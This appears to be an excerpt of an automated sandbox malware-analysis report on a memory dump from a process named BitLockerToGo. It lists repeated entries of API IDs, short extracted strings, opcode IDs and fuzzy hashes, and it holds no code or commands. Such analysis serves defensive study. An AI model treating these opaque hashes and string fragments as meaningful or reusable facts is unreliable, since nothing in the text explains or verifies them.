                                                                                                                                                          • Instruction ID: 76caae30cb6fa77cf2d0480afc4a32d482555d34d08f731cb62b09a057576ba4
                                                                                                                                                          • Opcode Fuzzy Hash: a8918c15477656cc8daef73c3f3a0404579f49981537884bf10d2b6879b085a5
                                                                                                                                                          • Instruction Fuzzy Hash: 4B8145BA904200DBD724AF15DC92AB773B0FF82354F09492EEC864B391E338D941C79A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID: /.-,
                                                                                                                                                          • API String ID: 2994545307-4180950418
                                                                                                                                                          • Opcode ID: e0f9e11d950cb37439ae44eec80e902b558a79d1b5258e11c1d8b142b8ac354a
                                                                                                                                                          • Instruction ID: 9ad1a62d6abdb815f9c8a9556e3d48383c3ceba71e43ac5ff45538b70e224522
                                                                                                                                                          • Opcode Fuzzy Hash: e0f9e11d950cb37439ae44eec80e902b558a79d1b5258e11c1d8b142b8ac354a
                                                                                                                                                          • Instruction Fuzzy Hash: C591C1316083118BD724CF18C88062FB7F2AF89750F19C92DEA95973A5EB35DC51C786
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID: /.-,
                                                                                                                                                          • API String ID: 2994545307-4180950418
                                                                                                                                                          • Opcode ID: 9591eb5e6f014507b6f77b7a37df3fb3db69a202356dd150857bd90b711e29c7
                                                                                                                                                          • Instruction ID: de809bb00f17f1e2c54f3df1d747ec6d57064335e84f41b1c3609222a8b362ac
                                                                                                                                                          • Opcode Fuzzy Hash: 9591eb5e6f014507b6f77b7a37df3fb3db69a202356dd150857bd90b711e29c7
                                                                                                                                                          • Instruction Fuzzy Hash: 4E81B1346043019BE714DF18C880A6BB7F2FF9A750F16852DE5848B365DB35DC51CB46
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ,
                                                                                                                                                          • API String ID: 0-3772416878
                                                                                                                                                          • Opcode ID: 87d5ed803c5b733315ab01095841bef12b7b20767e0dc7307d38f9d7e17edac2
                                                                                                                                                          • Instruction ID: eefe6184203060666edbc0889af857083423912bff3620e99674589105f4da06
                                                                                                                                                          • Opcode Fuzzy Hash: 87d5ed803c5b733315ab01095841bef12b7b20767e0dc7307d38f9d7e17edac2
                                                                                                                                                          • Instruction Fuzzy Hash: BBB139711093819FD321CF18C88061BFBE0AFA9704F488E2DE5D997382D635E919CBA7
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: \fs>
                                                                                                                                                          • API String ID: 0-699854602
                                                                                                                                                          • Opcode ID: 337138f4e4215cbfc7eaa64eca64cc6b5bb028d374e3f888f3c7000cdf7cea28
                                                                                                                                                          • Instruction ID: e026fd50d870f59186aba3a3de6d5e93a37883884e6e3bcbc309e70d0183b647
                                                                                                                                                          • Opcode Fuzzy Hash: 337138f4e4215cbfc7eaa64eca64cc6b5bb028d374e3f888f3c7000cdf7cea28
                                                                                                                                                          • Instruction Fuzzy Hash: 1DB1F575519B808BC3228B38C9853E7BFE5AB56314F498D6EC8EFC7386D638A505C706
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: EONQ
                                                                                                                                                          • API String ID: 0-2229190151
                                                                                                                                                          • Opcode ID: bfb22d384f13b7f54fd5d87b2983e82eb7c3fadec93facaf8624bbd5ac152fb2
                                                                                                                                                          • Instruction ID: a76a7a6bcaff0e592dbad9cc17801034314641e3190079893e41afc2bf5bcae7
                                                                                                                                                          • Opcode Fuzzy Hash: bfb22d384f13b7f54fd5d87b2983e82eb7c3fadec93facaf8624bbd5ac152fb2
                                                                                                                                                          • Instruction Fuzzy Hash: 54510732F412684BDB54CA79CCD23DFA7E2DB89320F1945B9C888E7381D9784D968B48
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: wW{
                                                                                                                                                          • API String ID: 0-3806686672
                                                                                                                                                          • Opcode ID: 62e6a419984f77f8fb23d3cea7b1386d9893fc736c7f0a2ad1c8c1a37104dab2
                                                                                                                                                          • Instruction ID: 7d12f8f514b71fb150ffa098ca01bcbd8d22198edcd9d55694019e078bf13a18
                                                                                                                                                          • Opcode Fuzzy Hash: 62e6a419984f77f8fb23d3cea7b1386d9893fc736c7f0a2ad1c8c1a37104dab2
                                                                                                                                                          • Instruction Fuzzy Hash: B2412034299301CFD7058F38E89026BB7E1EB8A316F598C7DE086C3362D63AD846CB15
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: +
                                                                                                                                                          • API String ID: 0-2126386893
                                                                                                                                                          • Opcode ID: a794292c5b2f766263ce056902814cd33f0a334f0ed32c26101f63c381c01e53
                                                                                                                                                          • Instruction ID: 67e8d549206588d00c05d0851586c540a1f2f819fe23713ce51036cfcb4ce85b
                                                                                                                                                          • Opcode Fuzzy Hash: a794292c5b2f766263ce056902814cd33f0a334f0ed32c26101f63c381c01e53
                                                                                                                                                          • Instruction Fuzzy Hash: B3414375609B41CFD328CF38D5D93A7BBE2AB89304F18886EC59B87385D739A845CB05
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 47
                                                                                                                                                          • API String ID: 0-1112425479
                                                                                                                                                          • Opcode ID: 08839e348e23fcb360676f012b37867764b0dd2162ddaa416d4c4b5948d1cdf3
                                                                                                                                                          • Instruction ID: c7510ebe19e2b473552174996d94a7c1ca77af5c1a7778dc99f7db51acd90bb6
                                                                                                                                                          • Opcode Fuzzy Hash: 08839e348e23fcb360676f012b37867764b0dd2162ddaa416d4c4b5948d1cdf3
                                                                                                                                                          • Instruction Fuzzy Hash: 79218B7400D3018AD304DF21C95166BBBF2EFD2319F04A91DF0D64B661E7B8C989CB8A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %*+(
                                                                                                                                                          • API String ID: 0-3233224373
                                                                                                                                                          • Opcode ID: fc8af48a4930ed1354326aebcf23a7e696fd3f78917aa8bb71f4a1efd1b347df
                                                                                                                                                          • Instruction ID: 53b8857e794f18ab87cd019d7de2b91d2dd55080db35ea1d131349e5b6579fe0
                                                                                                                                                          • Opcode Fuzzy Hash: fc8af48a4930ed1354326aebcf23a7e696fd3f78917aa8bb71f4a1efd1b347df
                                                                                                                                                          • Instruction Fuzzy Hash: BA2127307083509BDB2C8F14B98067FB3A2BF95B55F60051ED0821369BD739CA16CB9E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %*+(
                                                                                                                                                          • API String ID: 0-3233224373
                                                                                                                                                          • Opcode ID: 9af70b8f6cbc3c70dca74eb00381e3fcef9bf5563063a9e76a2bd2a41558f2db
                                                                                                                                                          • Instruction ID: 8237016886215cc8278a7af7c6f8f6b276ffff4dcf6ff5f6429baec8ab3bc397
                                                                                                                                                          • Opcode Fuzzy Hash: 9af70b8f6cbc3c70dca74eb00381e3fcef9bf5563063a9e76a2bd2a41558f2db
                                                                                                                                                          • Instruction Fuzzy Hash: DC018034609310DBD7148F12E890A3BB3B2EF86745F50AD2CD9851B256D375DD46C71A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: M-L
                                                                                                                                                          • API String ID: 0-3628306645
                                                                                                                                                          • Opcode ID: c70052da55240df270b89936481df9dfe3845e990ec9a0c4650baec86b6953da
                                                                                                                                                          • Instruction ID: d2ff77c061e2f7469c72e79564278c2da2bc67103c34b87218cd4374b0ebfb62
                                                                                                                                                          • Opcode Fuzzy Hash: c70052da55240df270b89936481df9dfe3845e990ec9a0c4650baec86b6953da
                                                                                                                                                          • Instruction Fuzzy Hash: E2D05B65A10244379554A52ADD5BE377D7D8743595F402124FC41E7395D810DC1543EA
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: [vSO
• API String ID: 0-448860619
• Opcode ID: e407b34540df400001dc5778b816732a2f9fc3c95ec119a49a36422e6199eb32
• Instruction ID: 5502fc275d410e11b81581b741b8fd9ce7e832fe9ff15ac3c708498acf514ec9
• Opcode Fuzzy Hash: e407b34540df400001dc5778b816732a2f9fc3c95ec119a49a36422e6199eb32
• Instruction Fuzzy Hash: E0B01238D4D18097D6888F6CA9B3170A7B8465710CB1C70BC894FE7243C402D053890D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a7e2ec72d853d2bfbfbfdb319afccc47f24a5273531eda53e4d4303f23a87cc4
                                                                                                                                                          • Instruction ID: 209e60cf7bf80287382b4f000f536cbd3f5e28b1c9feec9c4baa3c7f166c2617
                                                                                                                                                          • Opcode Fuzzy Hash: a7e2ec72d853d2bfbfbfdb319afccc47f24a5273531eda53e4d4303f23a87cc4
                                                                                                                                                          • Instruction Fuzzy Hash: 7E6114316083009BE7289F28C881A3BB7A2FFC5714F14896DF986873A2DB74DC06C795
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a400451c7af91138eb5eb73043359c27a26ddc6c422a615c787ea793587c2b0c
                                                                                                                                                          • Instruction ID: 8d72d14098f3c7d60832fc420af098260fe1c693be79538561085adcbea233ba
                                                                                                                                                          • Opcode Fuzzy Hash: a400451c7af91138eb5eb73043359c27a26ddc6c422a615c787ea793587c2b0c
                                                                                                                                                          • Instruction Fuzzy Hash: 6951F937619AD187C7288A3C5C102AEAB531BEB370F3E9367D9B54B3D1C9298C439356
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cc07671281396172990d871ca8447c485d9c7591983b8edd82a9f2cc7189f465
                                                                                                                                                          • Instruction ID: 17f562a13d4ee502afd020b4be555a82365a40c2b5f5fc5c6809e289e13f0443
                                                                                                                                                          • Opcode Fuzzy Hash: cc07671281396172990d871ca8447c485d9c7591983b8edd82a9f2cc7189f465
                                                                                                                                                          • Instruction Fuzzy Hash: 1A51E4B2E147254BC718DE2CE89122EB2D2ABC4305F99863DDC5A9B381EB34AC10C7C5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c8d23429eb03083d8ad6b52875692930ce62021611f4812b27f6aac4f420f026
                                                                                                                                                          • Instruction ID: fdc43c70927a67208ddd989978fb5724d702d6cb444deef10df8194624b1ef05
                                                                                                                                                          • Opcode Fuzzy Hash: c8d23429eb03083d8ad6b52875692930ce62021611f4812b27f6aac4f420f026
                                                                                                                                                          • Instruction Fuzzy Hash: B8515DB15087548FE314DF29D89435BBBE1FB88318F044A2EE5D987391E779DA088F86
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 129386c023a275c392eace29f07c6dc21b770b507e8fb9bdc0246277421e993d
                                                                                                                                                          • Instruction ID: 23da2868c5d33b026c2268501c948a56693228b541898265fc2801742d09375c
                                                                                                                                                          • Opcode Fuzzy Hash: 129386c023a275c392eace29f07c6dc21b770b507e8fb9bdc0246277421e993d
                                                                                                                                                          • Instruction Fuzzy Hash: 05519075A046009FC714EF18C480917B7A1FF89324F25867DE859AB392D735EC52CF9A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cb5dcd08d027ad22613818756b6d5467b2c669c5d5a0bcf9de2727fa8300f91d
                                                                                                                                                          • Instruction ID: 1deebda00461899859433273c51af892f917149bb424a7551e937cd11b42b505
                                                                                                                                                          • Opcode Fuzzy Hash: cb5dcd08d027ad22613818756b6d5467b2c669c5d5a0bcf9de2727fa8300f91d
                                                                                                                                                          • Instruction Fuzzy Hash: 66415830604340CBE7248F54D880A2BB3E6EB85709F14892EE6D58B346D73DED61CB5E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1ca9322d05551d697019e2ef725af6820d14189e120fc89b9010075c7ee9691e
                                                                                                                                                          • Instruction ID: b84a188268feb3bc4bb66fda38f13ad2e4dc3c8775cc23eceab36ed01cc849ae
                                                                                                                                                          • Opcode Fuzzy Hash: 1ca9322d05551d697019e2ef725af6820d14189e120fc89b9010075c7ee9691e
                                                                                                                                                          • Instruction Fuzzy Hash: 574124727083A01FD318CE3A889016BBAD2ABC6610F19C63EF1A6C7790E6798945E711
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f8c059e43be4a535d708b4a621a60a8cc57f347d2bb58e3ec555c5304d794362
                                                                                                                                                          • Instruction ID: 42f62d7ba04c00c2ef4d095ee132e04ae57741186284adf9d5084889062b7f5f
                                                                                                                                                          • Opcode Fuzzy Hash: f8c059e43be4a535d708b4a621a60a8cc57f347d2bb58e3ec555c5304d794362
                                                                                                                                                          • Instruction Fuzzy Hash: C53105316493108FE3108E19C8817ABB7E4EBC6714F148A2EE5D49B382D37D9E568F96
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cef309a830c05eef06d7282551732a2f9d35485cb54e6e96c37cac67246454bc
                                                                                                                                                          • Instruction ID: f0df7fd79487421271ee37c45451049943c32acc6194f4433201761664d86dc0
                                                                                                                                                          • Opcode Fuzzy Hash: cef309a830c05eef06d7282551732a2f9d35485cb54e6e96c37cac67246454bc
                                                                                                                                                          • Instruction Fuzzy Hash: 1B210BF69082086BC7209FA9DC847A677D5DB66318F05053AEC54C7391F679D848C399
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0d7843fea77be65ec2dc5be9c5aabad1ea28764278aaa30f8467571588f55f26
                                                                                                                                                          • Instruction ID: 7a50a9f99fe509ed5abd3d1444807cfdba8fa8f5c03ead7d3c5201709936c7ac
                                                                                                                                                          • Opcode Fuzzy Hash: 0d7843fea77be65ec2dc5be9c5aabad1ea28764278aaa30f8467571588f55f26
                                                                                                                                                          • Instruction Fuzzy Hash: 223174B5860601DFEB02AF11FC02A283A72F711747B54443AED1656337EB3795385B9D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: d54bd6890c34b4c4784bed1e370f35d3f2d488265aca28555433554b9eb81ed0
                                                                                                                                                          • Instruction ID: a6bc32531b65bb109f1d29ca75e18ad22b5e0675f30201dcfdcdce88cf59f270
                                                                                                                                                          • Opcode Fuzzy Hash: d54bd6890c34b4c4784bed1e370f35d3f2d488265aca28555433554b9eb81ed0
                                                                                                                                                          • Instruction Fuzzy Hash: D701893174630447E3205E15DC8063FB366EBC2B06F28886ED5C44B30AC23D9D618BEB
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                          • Instruction ID: c3389a028b57d2c6f8660b0fd5182bfb16cec91258370e18d2e670114cd09b91
                                                                                                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                          • Instruction Fuzzy Hash: 70110633A051D00EC3128D3C8400665BFA30E97234F29939EE4F99B3E6D6268D8A8359
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: MetricsSystem
• String ID: &~C$'wC$*xC$J~C$m|C$xzC${C
• API String ID: 4116985748-588620804
• Opcode ID: 764eab8b42627bb81cdfd695d464b7b564659876efbf52c05c039a8eca4bf054
• Instruction ID: 66dada05c327a1c61d24dc321b899d0899824898c12b3fe3090271d05fad01cc
• Opcode Fuzzy Hash: 764eab8b42627bb81cdfd695d464b7b564659876efbf52c05c039a8eca4bf054
• Instruction Fuzzy Hash: 4FA14CB44093888AF771DF54D5897CBBBE0BB85348F20892ED5888B650C7F9548DCF9A
Similarity
• API ID: AllocString
• String ID: 0$0$b$c$y$}
• API String ID: 2525500382-2751227332
• Opcode ID: bb8b5806c04763b47c3ab5a792d058afedefd6bca67dd728f44cdc8407738252
• Instruction ID: 821cf9130e8cd5f6ebb1de99dcc4691c8eaef027f498815a5d700e8551cc5c2a
• Opcode Fuzzy Hash: bb8b5806c04763b47c3ab5a792d058afedefd6bca67dd728f44cdc8407738252
• Instruction Fuzzy Hash: DC81E16010CBC0CEE7168B3884983167ED15B6621CF2886DDD4AA4F3D3C3ABD55BC766
Similarity
• API ID:
• String ID: [fbY$_nkQ$kkUp
• API String ID: 0-3145123041
• Opcode ID: 57f64d875186bd8352f334b1d93851cbe806884a8da132c403b6ed4246dd0043
• Instruction ID: af3b9e1362d38e8e29a38f19127dd51eee7be2d5c57223e9247a5dcb9c366cf1
• Opcode Fuzzy Hash: 57f64d875186bd8352f334b1d93851cbe806884a8da132c403b6ed4246dd0043
• Instruction Fuzzy Hash: EF712771504B418BE332CF25C881B63BBE2AF66311F188A2ED5EB4B792D739B405CB55
APIs
• SysAllocString.OLEAUT32(73A371AF), ref: 0043CEB0
• SysAllocString.OLEAUT32(F3BFF1A3), ref: 0043CF95
Similarity
• API ID: AllocString
• String ID: !$s%u'
• API String ID: 2525500382-439224852
• Opcode ID: 7aa0a3e6246a502dca2869c8a1477f858b5ec105c237375db835c5495004350d
• Instruction ID: 751ce87b811b7694680259d72d00ac5741bc3653d925cc6629c8f6403113edbc
• Opcode Fuzzy Hash: 7aa0a3e6246a502dca2869c8a1477f858b5ec105c237375db835c5495004350d
• Instruction Fuzzy Hash: 0841D0762993419BD308CFA6D8D025FBBE3ABC5304F199D2DE1949B345CBB8C50A8B52